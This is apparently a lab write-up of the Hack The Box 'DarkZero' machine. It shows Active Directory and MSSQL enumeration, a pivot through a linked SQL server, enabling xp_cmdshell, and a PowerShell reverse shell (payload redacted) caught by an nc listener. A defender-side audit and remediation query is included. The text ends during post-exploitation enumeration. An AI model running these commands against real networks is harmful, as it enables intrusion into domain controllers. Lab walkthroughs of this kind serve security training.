Hack-The-Box - Hard - Windows - DarkZero
Author: Yasir Mehmood

The DarkZero machine began with an exposed 1433/TCP port associated with Microsoft SQL Server (MSSQL). Using the provided credentials, I successfully authenticated to the MSSQL instance hosted on DC01.darkzero.htb.
During enumeration, I discovered a linked MSSQL instance on DC02.darkzero.ext. With sysadmin privileges on the original instance, I enabled xp_cmdshell, which allowed me to execute commands on DC02 and achieve lateral movement within the environment.
I then performed privilege escalation on DC02 by exploiting CVE-2024-30088, a vulnerability in the Microsoft Windows Server Kernel that enables token manipulation for local privilege escalation. This granted me administrative access and allowed me to retrieve the user.txt file from the Administrator’s desktop.
Next, I analyzed the Active Directory configuration on DC01 and identified that it was vulnerable due to Unconstrained Delegation being enabled. To exploit this misconfiguration, I coerced an authentication request from DC01 to DC02 via MSSQL and captured the Ticket Granting Ticket (TGT) using Rubeus.
Finally, I leveraged Mimikatz within a Metasploit shell to perform a DCSync attack, extracting the NTLM hash of the Administrator account on DC01. This ultimately provided full domain access and allowed me to obtain the root.txt file.
Enumeration
- I started with an initial port scan using Nmap and found port 1433/TCP to be open aside from the usual ports.
- The 1433/TCP port on Microsoft Windows operating systems is usually used by the Microsoft SQL Server (MSSQL) service.
┌──(kali@kali)-[~/HTB/DarkZero]
└─$ sudo nmap -p- 10.129.174.93 --min-rate 10000
[sudo] password for kali:
Nmap scan report for 10.129.174.93
Host is up (0.047s latency).
Not shown: 65513 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
2179/tcp open vmrdp
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49664/tcp open unknown
49666/tcp open unknown
49670/tcp open unknown
49671/tcp open unknown
49891/tcp open unknown
49908/tcp open unknown
49963/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 20.61 seconds
┌──(kali@kali)-[~/HTB/DarkZero]
└─$ sudo nmap -sC -sV 10.129.174.93
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-04 21:07 CEST
Nmap scan report for 10.129.174.93
Host is up (0.016s latency).
Not shown: 986 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-05 02:07:14Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
|_ssl-date: TLS randomness does not represent time
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-ntlm-info:
| 10.129.174.93:1433:
| Target_Name: darkzero
| NetBIOS_Domain_Name: darkzero
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: darkzero.htb
| DNS_Computer_Name: DC01.darkzero.htb
| DNS_Tree_Name: darkzero.htb
|_ Product_Version: 10.0.26100
| ms-sql-info:
| 10.129.174.93:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2025-10-05T02:08:34+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-10-05T02:03:43
|_Not valid after: 2055-10-05T02:03:43
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-10-05T02:07:54
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.50 seconds
- Based on the output of the port scan, I knew that I had to deal with a Domain Controller (DC).
- To spare me the suffering later, I synchronized the local time and date with the DC before moving on.
┌──(kali@kali)-[~/HTB/DarkZero]
└─$ sudo /etc/init.d/virtualbox-guest-utils stop
[sudo] password for kali:
Stopping virtualbox-guest-utils (via systemctl): virtualbox-guest-utils.service.
┌──(kali@kali)-[~/HTB/DarkZero]
└─$ sudo systemctl stop systemd-timesyncd
┌──(kali@kali)-[~/HTB/DarkZero]
└─$ sudo net time set -S 10.129.174.93
- While the Nmap scan with the Default Scripts and Version Enumeration options was running, I turned to the initial credentials the machine provided, as is common in Windows machine pentesting scenarios.
- I used enum4linux-ng to have an authenticated look at the server.
┌──(kali@kali)-[~/opt/01_information_gathering/enum4linux-ng]
└─$ python3 enum4linux-ng.py 10.129.174.93 -u 'john.w' -p 'RFulUtONCOL!'
ENUM4LINUX - next generation (v1.3.1)
==========================
| Target Information |
==========================
[*] Target ........... 10.129.174.93
[*] Username ......... 'john.w'
[*] Random Username .. 'mjclbkhn'
[*] Password ......... 'RFulUtONCOL!'
[*] Timeout .......... 5 second(s)
=======================================
| Listener Scan on 10.129.174.93 |
=======================================
[*] Checking LDAP
[+] LDAP is accessible on 389/tcp
[*] Checking LDAPS
[+] LDAPS is accessible on 636/tcp
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp
======================================================
| Domain Information via LDAP for 10.129.174.93 |
======================================================
[*] Trying LDAP
[+] Appears to be root/parent DC
[+] Long domain name is: darkzero.htb
=============================================================
| NetBIOS Names and Workgroup/Domain for 10.129.174.93 |
=============================================================
[-] Could not get NetBIOS names information via 'nmblookup': timed out
===========================================
| SMB Dialect Check on 10.129.174.93 |
===========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
SMB 1.0: false
SMB 2.02: true
SMB 2.1: true
SMB 3.0: true
SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false
SMB signing required: true
=============================================================
| Domain Information via SMB session for 10.129.174.93 |
=============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: DC01
NetBIOS domain name: darkzero
DNS domain: darkzero.htb
FQDN: DC01.darkzero.htb
Derived membership: domain member
Derived domain: darkzero
===========================================
| RPC Session Check on 10.129.174.93 |
===========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for user session
[+] Server allows session using username 'john.w', password 'RFulUtONCOL!'
[*] Check for random user
[-] Could not establish random user session: STATUS_LOGON_FAILURE
=====================================================
| Domain Information via RPC for 10.129.174.93 |
=====================================================
[+] Domain: darkzero
[+] Domain SID: S-1-5-21-1152179935-589108180-1989892463
[+] Membership: domain member
=================================================
| OS Information via RPC for 10.129.174.93 |
=================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[+] Found OS information via 'srvinfo'
[+] After merging OS information we have the following result:
OS: Windows 10, Windows Server 2019, Windows Server 2016
OS version: '10.0'
OS release: ''
OS build: '26100'
Native OS: not supported
Native LAN manager: not supported
Platform id: '500'
Server type: '0x80102f'
Server type string: Wk Sv Sql PDC Tim NT
=======================================
| Users via RPC on 10.129.174.93 |
=======================================
[*] Enumerating users via 'querydispinfo'
[+] Found 4 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 4 user(s) via 'enumdomusers'
[+] After merging user results we have 4 user(s) total:
'2603':
username: john.w
name: (null)
acb: '0x00000210'
description: (null)
'500':
username: Administrator
name: (null)
acb: '0x00000210'
description: Built-in account for administering the computer/domain
'501':
username: Guest
name: (null)
acb: '0x00000215'
description: Built-in account for guest access to the computer/domain
'502':
username: krbtgt
name: (null)
acb: '0x00020011'
description: Key Distribution Center Service Account
========================================
| Groups via RPC on 10.129.174.93 |
========================================
[*] Enumerating local groups
[+] Found 6 group(s) via 'enumalsgroups domain'
[*] Enumerating builtin groups
[+] Found 29 group(s) via 'enumalsgroups builtin'
[*] Enumerating domain groups
[+] Found 17 group(s) via 'enumdomgroups'
[+] After merging groups results we have 52 group(s) total:
'1101':
groupname: DnsAdmins
type: local
'1102':
groupname: DnsUpdateProxy
type: domain
'2601':
groupname: SQLServer2005SQLBrowserUser$DC01
type: local
'498':
groupname: Enterprise Read-only Domain Controllers
type: domain
'512':
groupname: Domain Admins
type: domain
'513':
groupname: Domain Users
type: domain
'514':
groupname: Domain Guests
type: domain
'515':
groupname: Domain Computers
type: domain
'516':
groupname: Domain Controllers
type: domain
'517':
groupname: Cert Publishers
type: local
'518':
groupname: Schema Admins
type: domain
'519':
groupname: Enterprise Admins
type: domain
'520':
groupname: Group Policy Creator Owners
type: domain
'521':
groupname: Read-only Domain Controllers
type: domain
'522':
groupname: Cloneable Domain Controllers
type: domain
'525':
groupname: Protected Users
type: domain
'526':
groupname: Key Admins
type: domain
'527':
groupname: Enterprise Key Admins
type: domain
'528':
groupname: Forest Trust Accounts
type: domain
'529':
groupname: External Trust Accounts
type: domain
'544':
groupname: Administrators
type: builtin
'545':
groupname: Users
type: builtin
'546':
groupname: Guests
type: builtin
'548':
groupname: Account Operators
type: builtin
'549':
groupname: Server Operators
type: builtin
'550':
groupname: Print Operators
type: builtin
'551':
groupname: Backup Operators
type: builtin
'552':
groupname: Replicator
type: builtin
'553':
groupname: RAS and IAS Servers
type: local
'554':
groupname: Pre-Windows 2000 Compatible Access
type: builtin
'555':
groupname: Remote Desktop Users
type: builtin
'556':
groupname: Network Configuration Operators
type: builtin
'557':
groupname: Incoming Forest Trust Builders
type: builtin
'558':
groupname: Performance Monitor Users
type: builtin
'559':
groupname: Performance Log Users
type: builtin
'560':
groupname: Windows Authorization Access Group
type: builtin
'561':
groupname: Terminal Server License Servers
type: builtin
'562':
groupname: Distributed COM Users
type: builtin
'568':
groupname: IIS_IUSRS
type: builtin
'569':
groupname: Cryptographic Operators
type: builtin
'571':
groupname: Allowed RODC Password Replication Group
type: local
'572':
groupname: Denied RODC Password Replication Group
type: local
'573':
groupname: Event Log Readers
type: builtin
'574':
groupname: Certificate Service DCOM Access
type: builtin
'575':
groupname: RDS Remote Access Servers
type: builtin
'576':
groupname: RDS Endpoint Servers
type: builtin
'577':
groupname: RDS Management Servers
type: builtin
'578':
groupname: Hyper-V Administrators
type: builtin
'579':
groupname: Access Control Assistance Operators
type: builtin
'580':
groupname: Remote Management Users
type: builtin
'582':
groupname: Storage Replica Administrators
type: builtin
'585':
groupname: OpenSSH Users
type: builtin
========================================
| Shares via RPC on 10.129.174.93 |
========================================
[*] Enumerating shares
[+] Found 5 share(s):
ADMIN$:
comment: Remote Admin
type: Disk
C$:
comment: Default share
type: Disk
IPC$:
comment: Remote IPC
type: IPC
NETLOGON:
comment: Logon server share
type: Disk
SYSVOL:
comment: Logon server share
type: Disk
[*] Testing share ADMIN$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share C$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share IPC$
[+] Mapping: OK, Listing: NOT SUPPORTED
[*] Testing share NETLOGON
[+] Mapping: OK, Listing: OK
[*] Testing share SYSVOL
[+] Mapping: OK, Listing: OK
===========================================
| Policies via RPC for 10.129.174.93 |
===========================================
[*] Trying port 445/tcp
/home/kali/opt/01_information_gathering/enum4linux-ng/enum4linux-ng.py:2686: DeprecationWarning: datetime.datetime.utcfromtimestamp() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.fromtimestamp(timestamp, datetime.UTC).
minutes = datetime.utcfromtimestamp(tmp).minute
/home/kali/opt/01_information_gathering/enum4linux-ng/enum4linux-ng.py:2687: DeprecationWarning: datetime.datetime.utcfromtimestamp() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.fromtimestamp(timestamp, datetime.UTC).
hours = datetime.utcfromtimestamp(tmp).hour
/home/kali/opt/01_information_gathering/enum4linux-ng/enum4linux-ng.py:2688: DeprecationWarning: datetime.datetime.utcfromtimestamp() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.fromtimestamp(timestamp, datetime.UTC).
time_diff = datetime.utcfromtimestamp(tmp) - datetime.utcfromtimestamp(0)
[+] Found policy:
Domain password information:
Password history length: 24
Minimum password length: 7
Maximum password age: 41 days 23 hours 53 minutes
Password properties:
- DOMAIN_PASSWORD_COMPLEX: true
- DOMAIN_PASSWORD_NO_ANON_CHANGE: false
- DOMAIN_PASSWORD_NO_CLEAR_CHANGE: false
- DOMAIN_PASSWORD_LOCKOUT_ADMINS: false
- DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: false
- DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: false
Domain lockout information:
Lockout observation window: 10 minutes
Lockout duration: 10 minutes
Lockout threshold: None
Domain logoff information:
Force logoff time: not set
===========================================
| Printers via RPC for 10.129.174.93 |
===========================================
[+] No printers available
Completed after 12.95 seconds
- At this point, I added darkzero.htb and DC01.darkzero.htb to the /etc/hosts file.
┌──(kali@kali)-[~/HTB/DarkZero]
└─$ tail -n 2 /etc/hosts
10.129.174.93 darkzero.htb
10.129.174.93 DC01.darkzero.htb
- Now, I finally moved over to port 445/TCP looking for some low-hanging fruit.
┌──(kali@kali)-[/media/…/HTB/Machines/DarkZero/files]
└─$ netexec smb 10.129.174.93 -u 'john.w' -p 'RFulUtONCOL!' --shares
SMB 10.129.174.93 445 DC01 [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
SMB 10.129.174.93 445 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
SMB 10.129.174.93 445 DC01 [*] Enumerated shares
SMB 10.129.174.93 445 DC01 Share Permissions Remark
SMB 10.129.174.93 445 DC01 ----- ----------- ------
SMB 10.129.174.93 445 DC01 ADMIN$ Remote Admin
SMB 10.129.174.93 445 DC01 C$ Default share
SMB 10.129.174.93 445 DC01 IPC$ READ Remote IPC
SMB 10.129.174.93 445 DC01 NETLOGON READ Logon server share
SMB 10.129.174.93 445 DC01 SYSVOL READ Logon server share
- And since IPC$ was readable, I performed a quick RID brute force to get a list of usernames for password spraying later.
┌──(kali@kali)-[/media/…/HTB/Machines/DarkZero/files]
└─$ netexec smb 10.129.174.93 -u 'john.w' -p 'RFulUtONCOL!' --rid-brute | grep 'SidTypeUser' | awk '{ print $6 }' | awk -F '\\' '{ print $2 }'
Administrator
Guest
krbtgt
DC01$
darkzero-ext$
john.w
Initial Access
- Then, I went for the uncommon open port 1433/TCP running MSSQL.
- Since the machine provided initial credentials, I tried to authenticate using those and got in.
┌──(kali@kali)-[~/HTB/DarkZero]
└─$ impacket-mssqlclient 'john.w':'RFulUtONCOL!'@'dc01.darkzero.htb' -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (darkzero\john.w guest@master)>
- First, I tried to figure out how the environment was structured and searched for linked MSSQL instances.
- Surprisingly, I indeed found another instance. It was running on DC02.darkzero.ext.
SQL (darkzero\john.w guest@master)> EXEC SP_LINKEDSERVERS;
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
----------------- ---------------- ----------- ----------------- ------------------ ------------ -------
DC01 SQLNCLI SQL Server DC01 NULL NULL NULL
DC02.darkzero.ext SQLNCLI SQL Server DC02.darkzero.ext NULL NULL NULL
- Then I moved on with the enumeration of the instance on DC02.darkzero.ext.
SQL (darkzero\john.w guest@master)> EXEC('SELECT SYSTEM_USER') AT [DC02.darkzero.ext];
------------
dc01_sql_svc
SQL (darkzero\john.w guest@master)> EXEC('SELECT IS_SRVROLEMEMBER(''sysadmin'')') AT [DC02.darkzero.ext];
-
1
Initial Access
- Now, knowing that I was sysadmin on the second instance, I went for enabling xp_cmdshell to achieve code execution.
SQL (darkzero\john.w guest@master)> EXEC('SELECT * FROM sys.configurations WHERE name = ''xp_cmdshell''') AT [DC02.darkzero.ext];
SQL (darkzero\john.w guest@master)> EXEC('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [DC02.darkzero.ext];
INFO(DC02): Line 196: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (darkzero\john.w guest@master)> EXEC('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [DC02.darkzero.ext];
INFO(DC02): Line 196: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (darkzero\john.w guest@master)> EXEC('EXEC xp_cmdshell ''whoami''') AT [DC02.darkzero.ext];
output
--------------------
darkzero-ext\svc_sql
NULL
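The hop above rests on three settings a defender can audit directly: a linked server reachable by a low-privileged login, a remote login mapping that lands callers on a sysadmin account (john.w arrived on DC02 as dc01_sql_svc), and RPC Out allowing EXEC (...) AT. The following T-SQL is an added example of that audit and its remediation, not part of the original writeup; it assumes the standard SQL Server catalog views, a login with VIEW ANY DEFINITION, the linked server name from the output above, and placeholder names for the remediation logins.

```sql
-- Added defender-side audit (not from the original writeup). Run on the
-- instance that owns the link (DC01 here). Assumes the standard SQL Server
-- catalog views and a login with VIEW ANY DEFINITION; the remediation at
-- the end uses placeholder login names.

-- 1. Every linked server and how callers are mapped onto it.
--    uses_self_credential = 0 with a remote_name is a fixed remote login;
--    local_principal_id = 0 means that mapping applies to ALL callers, so
--    a guest-level login such as darkzero\john.w reaches the remote side
--    as that one account (dc01_sql_svc in the output above).
--    is_rpc_out_enabled = 1 is what allows EXEC (...) AT [server].
SELECT  s.name                          AS linked_server,
        s.data_source,
        s.is_rpc_out_enabled,
        s.is_data_access_enabled,
        ISNULL(p.name, '<all logins>')  AS local_login,
        ll.remote_name                  AS remote_login,
        CASE
            WHEN ll.uses_self_credential = 1 THEN 'passes caller credentials'
            WHEN ll.remote_name IS NOT NULL AND ll.local_principal_id = 0
                 THEN 'FIXED remote login for ALL callers'
            WHEN ll.remote_name IS NOT NULL THEN 'fixed remote login'
            ELSE 'no mapping (access denied)'
        END                             AS mapping_kind
FROM    sys.servers s
LEFT JOIN sys.linked_logins     ll ON ll.server_id    = s.server_id
LEFT JOIN sys.server_principals p  ON p.principal_id  = ll.local_principal_id
WHERE   s.is_linked = 1
ORDER BY s.name, local_login;

-- 2. Local xp_cmdshell state. value_in_use = 1 is the post-RECONFIGURE
--    state the writeup produced on DC02; it should be 0 unless there is a
--    documented need for it.
SELECT  name, value, value_in_use
FROM    sys.configurations
WHERE   name IN ('show advanced options', 'xp_cmdshell');

-- 3. Read-only check of what a caller becomes on the far side of the link
--    and whether xp_cmdshell is already on there. Nothing is changed.
--    Repeat for each linked_server returned by query 1.
EXEC ('SELECT @@SERVERNAME                    AS remote_server,
              SYSTEM_USER                     AS effective_login,
              IS_SRVROLEMEMBER(''sysadmin'')  AS is_sysadmin,
              (SELECT value_in_use FROM sys.configurations
                WHERE name = ''xp_cmdshell'') AS xp_cmdshell_enabled')
     AT [DC02.darkzero.ext];

-- 4. Remediation. On the remote instance (run locally there, as sysadmin;
--    'show advanced options' is already 1 after the change shown above):
EXEC sp_configure 'xp_cmdshell', 0;  RECONFIGURE;
-- On the instance owning the link: drop the catch-all mapping, map only a
-- named local login to a non-sysadmin remote login, and, if the link is
-- only used for queries, switch RPC Out off so EXEC ... AT stops working.
EXEC sp_droplinkedsrvlogin @rmtsrvname = N'DC02.darkzero.ext', @locallogin = NULL;
EXEC sp_addlinkedsrvlogin  @rmtsrvname  = N'DC02.darkzero.ext',
                           @useself     = N'false',
                           @locallogin  = N'<named_local_login>',          -- placeholder
                           @rmtuser     = N'<low_privilege_remote_login>', -- placeholder
                           @rmtpassword = N'<password>';                   -- placeholder
EXEC sp_serveroption N'DC02.darkzero.ext', 'rpc out', 'false';
```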
- Now I prepared a simple reverse shell payload and executed it through xp_cmdshell on DC02 to get lateral movement.
SQL (darkzero\john.w guest@master)> EXEC('EXEC xp_cmdshell ''powershell -e <base64-encoded reverse shell payload>''') AT [DC02.darkzero.ext];
┌──(kali@kali)-[~/HTB/DarkZero]
└─$ nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.16.45] from (UNKNOWN) [10.129.174.93] 53667
PS C:\Windows\system32>
Post-Exploit Enumeration (svc_sql)
- After I got initial access on DC02, I started the enumeration of the user svc_sql.
PS C:\Windows\system32> whoami /all
USER INFORMATION
----------------
User Name SID
==================== ============================================
darkzero-ext\svc_sql S-1-5-21-1969715525-31638512-2552845157-1103
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ =============================================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT SERVICE\MSSQLSERVER Well-known group S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003 Enabled by default, Enabled group, Group owner
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
- Within C:\, I found Policy_Backup.inf, which was not really helpful for now.
PS C:\> type Policy_Backup.inf
[Unicode]
Unicode=yes
[System Access]
MinimumPasswordAge = 1
MaximumPasswordAge = 42
MinimumPasswordLength = 7
PasswordComplexity = 1
PasswordHistorySize = 24
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ForceLogoffWhenHourExpire = 0
NewAdministratorName = "Administrator"
NewGuestName = "Guest"
ClearTextPassword = 0
LSAAnonymousNameLookup = 0
EnableAdminAccount = 1
EnableGuestAccount = 0
[Event Audit]
AuditSystemEvents = 0
AuditLogonEvents = 0
AuditObjectAccess = 0
AuditPrivilegeUse = 0
AuditPolicyChange = 0
AuditAccountManage = 0
AuditProcessTracking = 0
AuditDSAccess = 0
AuditAccountLogon = 0
[Kerberos Policy]
MaxTicketAge = 10
MaxRenewAge = 7
MaxServiceAge = 600
MaxClockSkew = 5
TicketValidateClient = 1
[Registry Values]
MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole\SecurityLevel=4,0
MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole\SetCommand=4,0
MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\CachedLogonsCount=1,"10"
MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ForceUnlockLogon=4,0
MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\PasswordExpiryWarning=4,5
MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ScRemoveOption=1,"0"
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin=4,5
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser=4,3
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCAD=4,0
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\DontDisplayLastUserName=4,0
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection=4,1
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA=4,1
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableSecureUIAPaths=4,1
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableUIADesktopToggle=4,0
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization=4,1
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\LegalNoticeCaption=1,""
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\LegalNoticeText=7,
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop=4,1
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ScForceOption=4,0
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ShutdownWithoutLogon=4,0
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\UndockWithoutLogon=4,1
MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ValidateAdminCodeSignatures=4,0
MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\AuthenticodeEnabled=4,0
MACHINE\System\CurrentControlSet\Control\Lsa\AuditBaseObjects=4,0
MACHINE\System\CurrentControlSet\Control\Lsa\CrashOnAuditFail=4,0
MACHINE\System\CurrentControlSet\Control\Lsa\DisableDomainCreds=4,0
MACHINE\System\CurrentControlSet\Control\Lsa\EveryoneIncludesAnonymous=4,0
MACHINE\System\CurrentControlSet\Control\Lsa\FIPSAlgorithmPolicy\Enabled=4,0
MACHINE\System\CurrentControlSet\Control\Lsa\ForceGuest=4,0
MACHINE\System\CurrentControlSet\Control\Lsa\FullPrivilegeAuditing=3,0
MACHINE\System\CurrentControlSet\Control\Lsa\LimitBlankPasswordUse=4,1
MACHINE\System\CurrentControlSet\Control\Lsa\MSV1_0\NTLMMinClientSec=4,536870912
MACHINE\System\CurrentControlSet\Control\Lsa\MSV1_0\NTLMMinServerSec=4,536870912
MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash=4,1
MACHINE\System\CurrentControlSet\Control\Lsa\RestrictAnonymous=4,0
MACHINE\System\CurrentControlSet\Control\Lsa\RestrictAnonymousSAM=4,1
MACHINE\System\CurrentControlSet\Control\Print\Providers\LanMan Print Services\Servers\AddPrinterDrivers=4,1
MACHINE\System\CurrentControlSet\Control\SecurePipeServers\Winreg\AllowedExactPaths\Machine=7,System\CurrentControlSet\Control\ProductOptions,System\CurrentControlSet\Control\Server Applications,Software\Microsoft\Windows NT\CurrentVersion
MACHINE\System\CurrentControlSet\Control\SecurePipeServers\Winreg\AllowedPaths\Machine=7,System\CurrentControlSet\Control\Print\Printers,System\CurrentControlSet\Services\Eventlog,Software\Microsoft\OLAP Server,Software\Microsoft\Windows NT\CurrentVersion\Print,Software\Microsoft\Windows NT\CurrentVersion\Windows,System\CurrentControlSet\Control\ContentIndex,System\CurrentControlSet\Control\Terminal Server,System\CurrentControlSet\Control\Terminal Server\UserConfig,System\CurrentControlSet\Control\Terminal Server\DefaultUserConfiguration,Software\Microsoft\Windows NT\CurrentVersion\Perflib,System\CurrentControlSet\Services\SysmonLog,SYSTEM\CurrentControlSet\Services\CertSvc
